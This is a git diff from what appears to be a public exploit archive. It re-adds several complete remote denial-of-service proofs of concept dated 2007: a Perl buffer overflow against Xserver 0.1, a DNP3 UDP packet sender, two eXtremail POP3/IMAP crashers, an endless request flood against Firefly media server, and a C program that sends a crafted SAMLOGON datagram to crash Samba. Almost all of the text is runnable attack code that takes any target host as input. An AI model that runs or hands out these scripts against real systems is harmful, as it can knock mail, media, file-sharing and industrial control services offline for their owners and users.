@@ -1,38 +1,38 @@ -#!/usr/bin/perl -# -# _ _ _ -# __| | ___ _ _ ___ ___ ___ _ __ ___| |_ _ __ _ _ ___| |_ -# / _` |/ _ \ | | / __|/ __/ _ \| '_ \/ __| __| '__| | | |/ __| __| -# | (_| | __/ |_| \__ \ (_| (_) | | | \__ \ |_| | | |_| | (__| |_ -# \__,_|\___|\__,_|___/\___\___/|_| |_|___/\__|_| \__,_|\___|\__| -# d.e.u.s..c.o.n.s.t.r.u.c.t -# -# Type -> Proof-of-Concept (P0C) Remote DoS Buffer Overflow -# App -> Xserver 0.1 Alpha -# URL -> http://sourceforge.net/projects/xserver/ -# Found By -> deusconstruct -# -# Stack trace: -# Frame Function Args -# 18FDC978 610DE824 (41414141, 004020E4, 0040202E, 00000000) -# 18FDCD58 004015D4 (41414141, 41414141, 41414141, 41414141) -# -# Usage: perl xserver-dos-poc.pl www.target.com - -use LWP::UserAgent; - -$uniq = LWP::UserAgent->new; -$url = shift or die("Please insert a target domain or IP!"); -$buffer = 150; # Teh evil 0verflow ammount - -print "\n============================\n"; -print "Xserver 0.1 Alpha Remote DoS\n"; -print "DiSc0vEreD by deusconstruct\n"; -print "============================\n"; -print "\n"; -print "[+] Sending evil buffer to $url ...\n"; -$req = HTTP::Request->new(POST => "http://$url/" . A x $buffer); -$res = $uniq->request($req); -print "[+] Evil buffer sent! 
Enj0y!\n"; - -# milw0rm.com [2007-07-23] +#!/usr/bin/perl +# +# _ _ _ +# __| | ___ _ _ ___ ___ ___ _ __ ___| |_ _ __ _ _ ___| |_ +# / _` |/ _ \ | | / __|/ __/ _ \| '_ \/ __| __| '__| | | |/ __| __| +# | (_| | __/ |_| \__ \ (_| (_) | | | \__ \ |_| | | |_| | (__| |_ +# \__,_|\___|\__,_|___/\___\___/|_| |_|___/\__|_| \__,_|\___|\__| +# d.e.u.s..c.o.n.s.t.r.u.c.t +# +# Type -> Proof-of-Concept (P0C) Remote DoS Buffer Overflow +# App -> Xserver 0.1 Alpha +# URL -> http://sourceforge.net/projects/xserver/ +# Found By -> deusconstruct +# +# Stack trace: +# Frame Function Args +# 18FDC978 610DE824 (41414141, 004020E4, 0040202E, 00000000) +# 18FDCD58 004015D4 (41414141, 41414141, 41414141, 41414141) +# +# Usage: perl xserver-dos-poc.pl www.target.com + +use LWP::UserAgent; + +$uniq = LWP::UserAgent->new; +$url = shift or die("Please insert a target domain or IP!"); +$buffer = 150; # Teh evil 0verflow ammount + +print "\n============================\n"; +print "Xserver 0.1 Alpha Remote DoS\n"; +print "DiSc0vEreD by deusconstruct\n"; +print "============================\n"; +print "\n"; +print "[+] Sending evil buffer to $url ...\n"; +$req = HTTP::Request->new(POST => "http://$url/" . A x $buffer); +$res = $uniq->request($req); +print "[+] Evil buffer sent! Enj0y!\n"; + +# milw0rm.com [2007-07-23] diff --git a/platforms/linux/dos/4347.pl b/platforms/linux/dos/4347.pl index 445e5194f..178c786e4 100755 --- a/platforms/linux/dos/4347.pl +++ b/platforms/linux/dos/4347.pl 
@@ -1,143 +1,143 @@ -#!/usr/bin/perl -# Automatically generated by beSTORM(tm) -# Copyright Beyond Security (c) 2003-2007 ($Revision: 3741 $) - -# Attack vector: -# M0:P0:B0.BT0:B0.BT0:B0.BT0:B0.BT0 - -# Module: -# DNP3 - -use strict; -use warnings; - -use Getopt::Std; -use IO::Socket::INET; - -$SIG{INT} = \&abort; - -my $host = '192.168.4.52'; -my $port = 20000; -my $proto = 'udp'; -my $sockType = SOCK_DGRAM; -my $timeout = 1; - -#Read command line arguments -my %opt; -my $opt_string = 'hH:P:t:'; -getopts( "$opt_string", \%opt ); - -if (defined $opt{h}) { - usage() -} - -$host = $opt{H} ? $opt{H} : $host; -$port = $opt{P} ? $opt{P} : $port; -$timeout = $opt{t} ? $opt{t} : $timeout; - -my @commands = ( -{Command => 'Send', - Data => "\x05\x64\x15\xC2\x01\x00\x00\x00\x00\x00\xC3\xC0\x01\x01\x00". "\x01\x07\x08\x01\x02\x03\x04\x05\x06\x07\x08"}, -{Command => 'Receive'}, - -); - -### -# End user configurable part -### - -#1. Create a new connection -my $sock = new IO::Socket::INET ( - PeerAddr => $host, - PeerPort => $port, - Proto => $proto, - Type => $sockType, - Timeout => $timeout, - ) - or die "socket error: $!\n\n"; - -print "connected to: $host:$port\n"; - -$sock->autoflush(1); -binmode $sock; - -#2. communication part - -foreach my $command (@commands) -{ - if ($command->{'Command'} eq 'Receive') - { - my $buf = receive($sock, $timeout); - if (length $buf) - { - print "received: [$buf]\n"; - } - } - elsif ($command->{'Command'} eq 'Send') - { - print "sending: [".$command->{'Data'}."]\n"; - send ($sock, $command->{'Data'}, 0) or die "send failed, reason: $!\n"; - } -} - -#3. Close connection -close ($sock); - -#The end - -sub receive -{ - my $sock = shift; - my $timeout = shift; - - my $tmpbuf; - my $buf = ""; - - while(1) - { # Example from perldoc -f alarm - eval { - local $SIG{ALRM} = sub { die "timeout\n" }; - alarm $timeout; - - my $ret = read $sock, $tmpbuf, 1; #We read data one byte at a time. 
- if ( !defined $ret or $ret == 0 ) - { #EOF - die "timeout\n"; - } - - alarm 0; - $buf .= $tmpbuf; - }; - if ($@) { #time out - if($@ eq "timeout\n") - { - last; - } - else { - die "receive aborted\n"; - } - } - } #while - return $buf; -} - -sub abort -{ - print "aborting...\n"; - if ($sock) - { - close $sock; - } - die "User aborted operation\n"; -} -sub usage -{ - print "usage: $0 [-hHPt]\n"; - print "-h\t: this help message\n"; - print "-H\t: override default host - $host\n"; - print "-P\t: override default port - $port\n"; - print "-t\t: set socket timeout in seconds\n"; - exit 0; -} - -# milw0rm.com [2007-08-31] +#!/usr/bin/perl +# Automatically generated by beSTORM(tm) +# Copyright Beyond Security (c) 2003-2007 ($Revision: 3741 $) + +# Attack vector: +# M0:P0:B0.BT0:B0.BT0:B0.BT0:B0.BT0 + +# Module: +# DNP3 + +use strict; +use warnings; + +use Getopt::Std; +use IO::Socket::INET; + +$SIG{INT} = \&abort; + +my $host = '192.168.4.52'; +my $port = 20000; +my $proto = 'udp'; +my $sockType = SOCK_DGRAM; +my $timeout = 1; + +#Read command line arguments +my %opt; +my $opt_string = 'hH:P:t:'; +getopts( "$opt_string", \%opt ); + +if (defined $opt{h}) { + usage() +} + +$host = $opt{H} ? $opt{H} : $host; +$port = $opt{P} ? $opt{P} : $port; +$timeout = $opt{t} ? $opt{t} : $timeout; + +my @commands = ( +{Command => 'Send', + Data => "\x05\x64\x15\xC2\x01\x00\x00\x00\x00\x00\xC3\xC0\x01\x01\x00". "\x01\x07\x08\x01\x02\x03\x04\x05\x06\x07\x08"}, +{Command => 'Receive'}, + +); + +### +# End user configurable part +### + +#1. Create a new connection +my $sock = new IO::Socket::INET ( + PeerAddr => $host, + PeerPort => $port, + Proto => $proto, + Type => $sockType, + Timeout => $timeout, + ) + or die "socket error: $!\n\n"; + +print "connected to: $host:$port\n"; + +$sock->autoflush(1); +binmode $sock; + +#2. 
communication part + +foreach my $command (@commands) +{ + if ($command->{'Command'} eq 'Receive') + { + my $buf = receive($sock, $timeout); + if (length $buf) + { + print "received: [$buf]\n"; + } + } + elsif ($command->{'Command'} eq 'Send') + { + print "sending: [".$command->{'Data'}."]\n"; + send ($sock, $command->{'Data'}, 0) or die "send failed, reason: $!\n"; + } +} + +#3. Close connection +close ($sock); + +#The end + +sub receive +{ + my $sock = shift; + my $timeout = shift; + + my $tmpbuf; + my $buf = ""; + + while(1) + { # Example from perldoc -f alarm + eval { + local $SIG{ALRM} = sub { die "timeout\n" }; + alarm $timeout; + + my $ret = read $sock, $tmpbuf, 1; #We read data one byte at a time. + if ( !defined $ret or $ret == 0 ) + { #EOF + die "timeout\n"; + } + + alarm 0; + $buf .= $tmpbuf; + }; + if ($@) { #time out + if($@ eq "timeout\n") + { + last; + } + else { + die "receive aborted\n"; + } + } + } #while + return $buf; +} + +sub abort +{ + print "aborting...\n"; + if ($sock) + { + close $sock; + } + die "User aborted operation\n"; +} +sub usage +{ + print "usage: $0 [-hHPt]\n"; + print "-h\t: this help message\n"; + print "-H\t: override default host - $host\n"; + print "-P\t: override default port - $port\n"; + print "-t\t: set socket timeout in seconds\n"; + exit 0; +} + +# milw0rm.com [2007-08-31] diff --git a/platforms/linux/dos/4532.pl b/platforms/linux/dos/4532.pl index d9b3be24d..417f41060 100755 --- a/platforms/linux/dos/4532.pl +++ b/platforms/linux/dos/4532.pl 
@@ -1,85 +1,85 @@ -#!/usr/bin/perl -# -# extremail-v3.pl -# -# Copyright (c) 2006 by -# -# eXtremail <=2.1.1 remote root POC (x86-lnx) -# by mu-b - Fri Oct 06 2006 -# -# Tested on: eXtremail 2.1.1 (lnx) -# eXtremail 2.1.0 (lnx) -# -# - Private Source Code -DO NOT DISTRIBUTE - -# http://www.digit-labs.org/ -- Digit-Labs 2006!@$! -######## - -use Getopt::Std; getopts('t:n:u:p:', \%arg); -use Socket; - -&print_header; - -my $target; - -if (defined($arg{'t'})) { $target = $arg{'t'} } -if (!(defined($target))) { &usage; } - -my $pop3_port = 110; -my $send_delay = 1; - -my $NOP = 'A'; - -srand(time()); -while (1) { - if (connect_host($target, $pop3_port)) { - # [0,50) -> [1,50] - $max_len = int(rand(50) + 1); - - # [0, $max_len * 0.75) -> [0, ($max_len * 0x75) - 1] - $pad1_len = int(rand($max_len * 0.75)); - - # [0, ($max_len - $pad1_len)/2) -> [1, ($max_len - $pad1_len)/2] - $pad2_len = int(rand(($max_len - $pad1_len)/length("%s")) + 1); - - $pad3_len = $max_len - $pad1_len - ($pad2_len * length("%s")); - - $buf = "USER ". - ($NOP x $pad1_len). - ("%s" x $pad2_len). - ($NOP x $pad3_len). 
- "\n"; - print("-> * Sending: $max_len $pad1_len $pad2_len $pad3_len ".$buf); - send(SOCKET, $buf, 0); - sleep($send_delay); - - close(SOCKET); - } -} - -sub print_header { - print("eXtremail <=2.1.1 remote root POC (x86-lnx)\n"); - print("by: \n"); - print("http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n"); -} - -sub usage { - print(qq(Usage: $0 -t - - -t : hostname to test -)); - - exit(1); -} - -sub connect_host { - ($target, $port) = @_; - $iaddr = inet_aton($target) || die("Error: $!\n"); - $paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n"); - $proto = getprotobyname('tcp') || die("Error: $!\n"); - - socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); - connect(SOCKET, $paddr) || die("Error: $!\n"); - return(1338); -} - -# milw0rm.com [2007-10-15] +#!/usr/bin/perl +# +# extremail-v3.pl +# +# Copyright (c) 2006 by +# +# eXtremail <=2.1.1 remote root POC (x86-lnx) +# by mu-b - Fri Oct 06 2006 +# +# Tested on: eXtremail 2.1.1 (lnx) +# eXtremail 2.1.0 (lnx) +# +# - Private Source Code -DO NOT DISTRIBUTE - +# http://www.digit-labs.org/ -- Digit-Labs 2006!@$! +######## + +use Getopt::Std; getopts('t:n:u:p:', \%arg); +use Socket; + +&print_header; + +my $target; + +if (defined($arg{'t'})) { $target = $arg{'t'} } +if (!(defined($target))) { &usage; } + +my $pop3_port = 110; +my $send_delay = 1; + +my $NOP = 'A'; + +srand(time()); +while (1) { + if (connect_host($target, $pop3_port)) { + # [0,50) -> [1,50] + $max_len = int(rand(50) + 1); + + # [0, $max_len * 0.75) -> [0, ($max_len * 0x75) - 1] + $pad1_len = int(rand($max_len * 0.75)); + + # [0, ($max_len - $pad1_len)/2) -> [1, ($max_len - $pad1_len)/2] + $pad2_len = int(rand(($max_len - $pad1_len)/length("%s")) + 1); + + $pad3_len = $max_len - $pad1_len - ($pad2_len * length("%s")); + + $buf = "USER ". + ($NOP x $pad1_len). + ("%s" x $pad2_len). + ($NOP x $pad3_len). 
+ "\n"; + print("-> * Sending: $max_len $pad1_len $pad2_len $pad3_len ".$buf); + send(SOCKET, $buf, 0); + sleep($send_delay); + + close(SOCKET); + } +} + +sub print_header { + print("eXtremail <=2.1.1 remote root POC (x86-lnx)\n"); + print("by: \n"); + print("http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n"); +} + +sub usage { + print(qq(Usage: $0 -t + + -t : hostname to test +)); + + exit(1); +} + +sub connect_host { + ($target, $port) = @_; + $iaddr = inet_aton($target) || die("Error: $!\n"); + $paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n"); + $proto = getprotobyname('tcp') || die("Error: $!\n"); + + socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); + connect(SOCKET, $paddr) || die("Error: $!\n"); + return(1338); +} + +# milw0rm.com [2007-10-15] diff --git a/platforms/linux/dos/4535.pl b/platforms/linux/dos/4535.pl index 99c9ebff5..ac7a7bd77 100755 --- a/platforms/linux/dos/4535.pl +++ b/platforms/linux/dos/4535.pl 
@@ -1,79 +1,79 @@ -#!/usr/bin/perl -# -# extremail-v8.pl -# -# Copyright (c) 2007 by -# -# eXtremail <=2.1.1 remote PoC -# by mu-b - Wed Jan 31 2007 -# -# Tested on: eXtremail 2.1.1 (lnx) -# eXtremail 2.1.0 (lnx) -# -# - Private Source Code -DO NOT DISTRIBUTE - -# http://www.digit-labs.org/ -- Digit-Labs 2007!@$! -######## - -use Getopt::Std; getopts('t:n:u:p:', \%arg); -use Socket; - -&print_header; - -my $target; - -if (defined($arg{'t'})) { $target = $arg{'t'} } -if (defined($arg{'n'})) { $offset = $arg{'n'} } -if (!(defined($target))) { &usage; } - -my $imapd_port = 143; -my $send_delay = 10; -my $loop = 2; - -my $NOP = 'A'; - -if (connect_host($target, $imapd_port)) { - print("-> * Connected\n"); - sleep(16); - - print("-> * Sending payload\n"); - $buf = "\x00".($NOP x (0x2710-1)); - send(SOCKET, $buf, 0); - sleep($send_delay); - - $buf = $NOP x 0x2710; - while ($loop--) { - print("-> * Sending payload ".$loop."\n"); - send(SOCKET, $buf, 0); - sleep($send_delay); - } - - print("-> * Successfully sent payload!\n"); -} - -sub print_header { - print("eXtremail <=2.1.1 remote PoC\n"); - print("by: \n"); - print("http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n"); -} - -sub usage { - print(qq(Usage: $0 -t - - -t : hostname to test -)); - - exit(1); -} - -sub connect_host { - ($target, $port) = @_; - $iaddr = inet_aton($target) || die("Error: $!\n"); - $paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n"); - $proto = getprotobyname('tcp') || die("Error: $!\n"); - - socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); - connect(SOCKET, $paddr) || die("Error: $!\n"); - return(1338); -} - -# milw0rm.com [2007-10-15] +#!/usr/bin/perl +# +# extremail-v8.pl +# +# Copyright (c) 2007 by +# +# eXtremail <=2.1.1 remote PoC +# by mu-b - Wed Jan 31 2007 +# +# Tested on: eXtremail 2.1.1 (lnx) +# eXtremail 2.1.0 (lnx) +# +# - Private Source Code -DO NOT DISTRIBUTE - +# http://www.digit-labs.org/ -- Digit-Labs 2007!@$! 
+######## + +use Getopt::Std; getopts('t:n:u:p:', \%arg); +use Socket; + +&print_header; + +my $target; + +if (defined($arg{'t'})) { $target = $arg{'t'} } +if (defined($arg{'n'})) { $offset = $arg{'n'} } +if (!(defined($target))) { &usage; } + +my $imapd_port = 143; +my $send_delay = 10; +my $loop = 2; + +my $NOP = 'A'; + +if (connect_host($target, $imapd_port)) { + print("-> * Connected\n"); + sleep(16); + + print("-> * Sending payload\n"); + $buf = "\x00".($NOP x (0x2710-1)); + send(SOCKET, $buf, 0); + sleep($send_delay); + + $buf = $NOP x 0x2710; + while ($loop--) { + print("-> * Sending payload ".$loop."\n"); + send(SOCKET, $buf, 0); + sleep($send_delay); + } + + print("-> * Successfully sent payload!\n"); +} + +sub print_header { + print("eXtremail <=2.1.1 remote PoC\n"); + print("by: \n"); + print("http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n"); +} + +sub usage { + print(qq(Usage: $0 -t + + -t : hostname to test +)); + + exit(1); +} + +sub connect_host { + ($target, $port) = @_; + $iaddr = inet_aton($target) || die("Error: $!\n"); + $paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n"); + $proto = getprotobyname('tcp') || die("Error: $!\n"); + + socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); + connect(SOCKET, $paddr) || die("Error: $!\n"); + return(1338); +} + +# milw0rm.com [2007-10-15] diff --git a/platforms/linux/dos/4600.py b/platforms/linux/dos/4600.py index f6e62f983..2337ec161 100755 --- a/platforms/linux/dos/4600.py +++ b/platforms/linux/dos/4600.py 
@@ -1,38 +1,38 @@
-#!C:\python25\python25.exe
-
-"""
-Advisory : [UPH-07-02]
-mt-dappd/Firefly media server remote DoS
-Discovered by nnp
-http://www.unprotectedhex.com
-"""
-
-import sys
-import socket
-import time
-
-if len(sys.argv) != 3:
- sys.exit(-1)
-
-kill_msg = """GET /xml-rpc?method=stats HTTP/1.1\r\n
-Authorization:\r\n\r\n"""
-
-host = sys.argv[1]
-port = sys.argv[2]
-
-print '[+] Host : ' + host
-print '[+] Port : ' + port
-
-print "[+] Sending "
-print kill_msg
-
-ctr = 1
-while 1:
- print '[+] Ctr : ' + str(ctr)
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.connect((host, int(port)))
- s.send(kill_msg)
- s.close()
- ctr += 1
-
-# milw0rm.com [2007-11-02]
+#!C:\python25\python25.exe
+
+"""
+Advisory : [UPH-07-02]
+mt-dappd/Firefly media server remote DoS
+Discovered by nnp
+http://www.unprotectedhex.com
+"""
+
+import sys
+import socket
+import time
+
+if len(sys.argv) != 3:
+ sys.exit(-1)
+
+kill_msg = """GET /xml-rpc?method=stats HTTP/1.1\r\n
+Authorization:\r\n\r\n"""
+
+host = sys.argv[1]
+port = sys.argv[2]
+
+print '[+] Host : ' + host
+print '[+] Port : ' + port
+
+print "[+] Sending "
+print kill_msg
+
+ctr = 1
+while 1:
+ print '[+] Ctr : ' + str(ctr)
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.connect((host, int(port)))
+ s.send(kill_msg)
+ s.close()
+ ctr += 1
+
+# milw0rm.com [2007-11-02]
diff --git a/platforms/linux/dos/4732.c b/platforms/linux/dos/4732.c
index 6ee956d8f..cd86c5220 100755
--- a/platforms/linux/dos/4732.c
+++ b/platforms/linux/dos/4732.c
@@ -1,229 +1,229 @@ -/* http://secunia.com/secunia_research/2007-99/advisory/ - * - * A remote attacker could send a specially crafted "SAMLOGON" domain - * logon packet, possibly leading to the execution of arbitrary code with - * elevated privileges. Note that this vulnerability is exploitable only - * when domain logon support is enabled in Samba. - * - * /////// - * - * Sample/simple POC [crash only] by a bored guy at asmx86 gmail [com], further exploitation or not.. is left as an exercise to the reader. - * - * laneleb & petemir, a true love in this world! hi! - * - * kangaroo kangaroo... - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -/* smb ripped defines/etc */ - -#define MAX_DGRAM_SIZE 576 -#define MAX_NETBIOSNAME_LEN 16 -typedef char nstring[MAX_NETBIOSNAME_LEN]; -typedef char unstring[MAX_NETBIOSNAME_LEN*4]; -enum node_type {B_NODE=0, P_NODE=1, M_NODE=2, NBDD_NODE=3}; - -#define PTR_DIFF(p1,p2) (/*(ptrdiff_t)*/(((const char *)(p1)) - (const char *)(p2))) - -#define CVAL_NC(buf,pos) (((unsigned char *)(buf))[pos]) /* Non-const version of CVAL */ -#define SSVALX(buf,pos,val) (CVAL_NC(buf,pos)=(unsigned char)((val)&0xFF),CVAL_NC(buf,pos+1)=(unsigned char)((val)>>8)) - -#define SSVAL(buf,pos,val) SSVALX((buf),(pos),((uint16_t)(val))) -#define SCVAL(buf,pos,val) (CVAL_NC(buf,pos) = (val)) - -/* A netbios name structure. */ -struct nmb_name { - nstring name; - char scope[64]; - unsigned int name_type; -}; - -void safe_strcpy(char *a, char *b, uint32_t size) -{ - strcpy(b, a); -} - -void put_name(char *dest, const char *name, int pad, unsigned int name_type) -{ - size_t len = strlen(name); - - memcpy(dest, name, (len < MAX_NETBIOSNAME_LEN) ? 
len : MAX_NETBIOSNAME_LEN - 1); - if (len < MAX_NETBIOSNAME_LEN - 1) - { - memset(dest + len, pad, MAX_NETBIOSNAME_LEN - 1 - len); - } - - dest[MAX_NETBIOSNAME_LEN - 1] = name_type; -} - -int put_nmb_name(char *buf,int offset,struct nmb_name *name) -{ - int ret,m; - nstring buf1; - char *p; - - if (strcmp(name->name,"*") == 0) - { - /* special case for wildcard name */ - put_name(buf1, "*", '\0', name->name_type); - } - else - { - put_name(buf1, name->name, ' ', name->name_type); - } - - buf[offset] = 0x20; - - ret = 34; - - for (m=0;m>4)&0xF); - buf[offset+2+2*m] = 'A' + (buf1[m]&0xF); - } - offset += 33; - - buf[offset] = 0; - - if (name->scope[0]) - { - /* XXXX this scope handling needs testing */ - ret += strlen(name->scope) + 1; - safe_strcpy(&buf[offset+1],name->scope,sizeof(name->scope)); - - p = &buf[offset+1]; - while ((p = strchr(p,'.'))) - { - buf[offset] = PTR_DIFF(p,&buf[offset+1]); - offset += (buf[offset] + 1); - p = &buf[offset+1]; - } - buf[offset] = strlen(&buf[offset+1]); - } - - return(ret); -} - -typedef struct exudp_s -{ - unsigned char msg_type; - unsigned char flags; - uint16_t dgm_id; - uint32_t source_ip; - uint16_t source_port; - uint16_t dgm_len; - uint16_t pOffset; - struct nmb_name source_name; - struct nmb_name dest_name; -} exudp; - -/* code */ - -int send_udp(int ip, char *packet, unsigned int packetSize) -{ - int fd; - struct sockaddr_in to; - int len; - - if( (fd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) - return 0; - - to.sin_family = AF_INET; - to.sin_addr.s_addr = ip; - to.sin_port = htons(138); - - if( (len = sendto(fd, packet, packetSize, 0, (struct sockaddr *)&to, sizeof(struct sockaddr_in))) < 0) - { - perror("sendto"); - return 0; - } - - return len; -} - -int main(int argc, char *argv[]) -{ - unsigned char samlogon[10240]; - unsigned int nlOffset; - exudp dgPacket; - - printf("smb_mailslot() POC by asmx86@gmail.com\n\n"); - - if(argc < 3) - { - printf("Usage: %s \n\n", argv[0]); - exit(1); - } - - if(strlen(argv[1]) > 15) - 
{ - printf("[!] netbios victim's name too long\n"); - exit(1); - } - - memset(samlogon, 0, sizeof(samlogon)); - - dgPacket.msg_type = 0x11; - dgPacket.flags = 1; - dgPacket.dgm_id = 0xdead; - dgPacket.source_ip = 0xdeadbeef; - dgPacket.source_port = 0xc0fe; - dgPacket.dgm_len = 0; - dgPacket.pOffset = 0; - - strcpy(dgPacket.source_name.name, "ASMX86@GMAILCOM"); - strcpy(dgPacket.dest_name.name, argv[1]); - - nlOffset = 14; - - nlOffset += put_nmb_name((char *)&samlogon, nlOffset, &dgPacket.source_name); - nlOffset += put_nmb_name((char *)&samlogon, nlOffset, &dgPacket.dest_name); - -#define OFFSET 97 - - nlOffset -= 4; - SCVAL(samlogon, nlOffset+4, 0); - SSVAL(samlogon, nlOffset+4+OFFSET, 18); - SCVAL(samlogon, nlOffset+7, 0); - SCVAL(samlogon, nlOffset+8, 0x25); - SSVAL(samlogon, nlOffset+59, 397); - - SSVAL(samlogon, nlOffset+61, OFFSET); - - SSVAL(samlogon, nlOffset+63, 0); - - SSVAL(samlogon, nlOffset+36, 12); - memcpy(&samlogon[nlOffset+39+(12*2)], "\\MAILSLOT\\NET\\NTLOGON", 21); - - memcpy(&samlogon[nlOffset+4+OFFSET+4], "\x41\x00\x41\x00\x00\x00", 6); - memcpy(&samlogon[nlOffset+4+OFFSET+4+6-1], "\x42\x00\x42\x00\x00\x00", 6); - memset(&samlogon[nlOffset+4+OFFSET+4+6+6], '\x43', 260); //play with this value ;) - - nlOffset = 576; - - dgPacket.dgm_len = nlOffset - 14; - dgPacket.dgm_len = htons(dgPacket.dgm_len); - - memcpy(&samlogon, &dgPacket, 14); - - if(!send_udp(inet_addr(argv[2]), samlogon, nlOffset)) - fprintf(stderr, "[!] Error sending UDP packet\n"); - else - fprintf(stderr, "[*] packet sent\n"); - - return 0; -} -//eof - -// milw0rm.com [2007-12-14] +/* http://secunia.com/secunia_research/2007-99/advisory/ + * + * A remote attacker could send a specially crafted "SAMLOGON" domain + * logon packet, possibly leading to the execution of arbitrary code with + * elevated privileges. Note that this vulnerability is exploitable only + * when domain logon support is enabled in Samba. 
+ * + * /////// + * + * Sample/simple POC [crash only] by a bored guy at asmx86 gmail [com], further exploitation or not.. is left as an exercise to the reader. + * + * laneleb & petemir, a true love in this world! hi! + * + * kangaroo kangaroo... + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +/* smb ripped defines/etc */ + +#define MAX_DGRAM_SIZE 576 +#define MAX_NETBIOSNAME_LEN 16 +typedef char nstring[MAX_NETBIOSNAME_LEN]; +typedef char unstring[MAX_NETBIOSNAME_LEN*4]; +enum node_type {B_NODE=0, P_NODE=1, M_NODE=2, NBDD_NODE=3}; + +#define PTR_DIFF(p1,p2) (/*(ptrdiff_t)*/(((const char *)(p1)) - (const char *)(p2))) + +#define CVAL_NC(buf,pos) (((unsigned char *)(buf))[pos]) /* Non-const version of CVAL */ +#define SSVALX(buf,pos,val) (CVAL_NC(buf,pos)=(unsigned char)((val)&0xFF),CVAL_NC(buf,pos+1)=(unsigned char)((val)>>8)) + +#define SSVAL(buf,pos,val) SSVALX((buf),(pos),((uint16_t)(val))) +#define SCVAL(buf,pos,val) (CVAL_NC(buf,pos) = (val)) + +/* A netbios name structure. */ +struct nmb_name { + nstring name; + char scope[64]; + unsigned int name_type; +}; + +void safe_strcpy(char *a, char *b, uint32_t size) +{ + strcpy(b, a); +} + +void put_name(char *dest, const char *name, int pad, unsigned int name_type) +{ + size_t len = strlen(name); + + memcpy(dest, name, (len < MAX_NETBIOSNAME_LEN) ? 
len : MAX_NETBIOSNAME_LEN - 1); + if (len < MAX_NETBIOSNAME_LEN - 1) + { + memset(dest + len, pad, MAX_NETBIOSNAME_LEN - 1 - len); + } + + dest[MAX_NETBIOSNAME_LEN - 1] = name_type; +} + +int put_nmb_name(char *buf,int offset,struct nmb_name *name) +{ + int ret,m; + nstring buf1; + char *p; + + if (strcmp(name->name,"*") == 0) + { + /* special case for wildcard name */ + put_name(buf1, "*", '\0', name->name_type); + } + else + { + put_name(buf1, name->name, ' ', name->name_type); + } + + buf[offset] = 0x20; + + ret = 34; + + for (m=0;m>4)&0xF); + buf[offset+2+2*m] = 'A' + (buf1[m]&0xF); + } + offset += 33; + + buf[offset] = 0; + + if (name->scope[0]) + { + /* XXXX this scope handling needs testing */ + ret += strlen(name->scope) + 1; + safe_strcpy(&buf[offset+1],name->scope,sizeof(name->scope)); + + p = &buf[offset+1]; + while ((p = strchr(p,'.'))) + { + buf[offset] = PTR_DIFF(p,&buf[offset+1]); + offset += (buf[offset] + 1); + p = &buf[offset+1]; + } + buf[offset] = strlen(&buf[offset+1]); + } + + return(ret); +} + +typedef struct exudp_s +{ + unsigned char msg_type; + unsigned char flags; + uint16_t dgm_id; + uint32_t source_ip; + uint16_t source_port; + uint16_t dgm_len; + uint16_t pOffset; + struct nmb_name source_name; + struct nmb_name dest_name; +} exudp; + +/* code */ + +int send_udp(int ip, char *packet, unsigned int packetSize) +{ + int fd; + struct sockaddr_in to; + int len; + + if( (fd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) + return 0; + + to.sin_family = AF_INET; + to.sin_addr.s_addr = ip; + to.sin_port = htons(138); + + if( (len = sendto(fd, packet, packetSize, 0, (struct sockaddr *)&to, sizeof(struct sockaddr_in))) < 0) + { + perror("sendto"); + return 0; + } + + return len; +} + +int main(int argc, char *argv[]) +{ + unsigned char samlogon[10240]; + unsigned int nlOffset; + exudp dgPacket; + + printf("smb_mailslot() POC by asmx86@gmail.com\n\n"); + + if(argc < 3) + { + printf("Usage: %s \n\n", argv[0]); + exit(1); + } + + if(strlen(argv[1]) > 15) + 
{ + printf("[!] netbios victim's name too long\n"); + exit(1); + } + + memset(samlogon, 0, sizeof(samlogon)); + + dgPacket.msg_type = 0x11; + dgPacket.flags = 1; + dgPacket.dgm_id = 0xdead; + dgPacket.source_ip = 0xdeadbeef; + dgPacket.source_port = 0xc0fe; + dgPacket.dgm_len = 0; + dgPacket.pOffset = 0; + + strcpy(dgPacket.source_name.name, "ASMX86@GMAILCOM"); + strcpy(dgPacket.dest_name.name, argv[1]); + + nlOffset = 14; + + nlOffset += put_nmb_name((char *)&samlogon, nlOffset, &dgPacket.source_name); + nlOffset += put_nmb_name((char *)&samlogon, nlOffset, &dgPacket.dest_name); + +#define OFFSET 97 + + nlOffset -= 4; + SCVAL(samlogon, nlOffset+4, 0); + SSVAL(samlogon, nlOffset+4+OFFSET, 18); + SCVAL(samlogon, nlOffset+7, 0); + SCVAL(samlogon, nlOffset+8, 0x25); + SSVAL(samlogon, nlOffset+59, 397); + + SSVAL(samlogon, nlOffset+61, OFFSET); + + SSVAL(samlogon, nlOffset+63, 0); + + SSVAL(samlogon, nlOffset+36, 12); + memcpy(&samlogon[nlOffset+39+(12*2)], "\\MAILSLOT\\NET\\NTLOGON", 21); + + memcpy(&samlogon[nlOffset+4+OFFSET+4], "\x41\x00\x41\x00\x00\x00", 6); + memcpy(&samlogon[nlOffset+4+OFFSET+4+6-1], "\x42\x00\x42\x00\x00\x00", 6); + memset(&samlogon[nlOffset+4+OFFSET+4+6+6], '\x43', 260); //play with this value ;) + + nlOffset = 576; + + dgPacket.dgm_len = nlOffset - 14; + dgPacket.dgm_len = htons(dgPacket.dgm_len); + + memcpy(&samlogon, &dgPacket, 14); + + if(!send_udp(inet_addr(argv[2]), samlogon, nlOffset)) + fprintf(stderr, "[!] Error sending UDP packet\n"); + else + fprintf(stderr, "[*] packet sent\n"); + + return 0; +} 